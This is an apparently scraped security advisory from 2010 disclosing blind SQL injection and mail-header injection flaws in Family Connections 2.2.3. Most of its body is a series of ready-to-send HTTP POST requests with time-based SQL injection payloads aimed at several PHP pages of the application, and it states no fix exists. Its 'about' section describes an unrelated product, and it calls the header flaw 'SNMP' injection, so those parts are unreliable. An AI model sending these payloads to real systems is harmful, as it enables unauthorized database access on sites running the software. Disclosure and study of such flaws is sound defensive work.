扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
Family Connections 2.2.3 Multiple Remote Vulnerabilities NameFamily Connections Vendorhttp://www.familycms.com Versions Affected 2.2.3 AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-10-05 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX I. ABOUT THE APPLICATION Based on one of the world's leading structureand content management systems - WebSiteAdmin, WSCreator(WS standing for WebSite) is powerful application for handling multiple websites. II. DESCRIPTION Many fields are not properly sanitised. III. ANALYSIS Summary: A) Multiple Blind SQL Injection B) Multiple SNMP Injection A) Multiple Blind SQL Injection All numericfieldsthat I tested are vulnerable to Blind SQL Injection. Thesebugsexistbecause of the use of the unquotes SQL fields (numeric fileds only) whichare not properly sani- tised. B) Multiple SNMP Injection The parameters passed to the mail() PHP functionarenot properly sanitised. Thisallowsto inject arbitrary SNMP headers. IV. SAMPLE CODE A) Multiple Blind SQL Injection POST /path/recipes.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length: 73 Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL) POST /path/gallery/upload.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length: 70 Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL))) POST /path/addressbook.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL) POST /path/addressbook.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd editsubmit=1&uid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL) POST /path/calendar.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length: 67 Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL) POST /path/calendar.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length:73 Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL) POST /path/familynews.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length:73 Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL) POST /path/familynews.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length:73 Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL) V. FIX No Fix. |
体验盒子
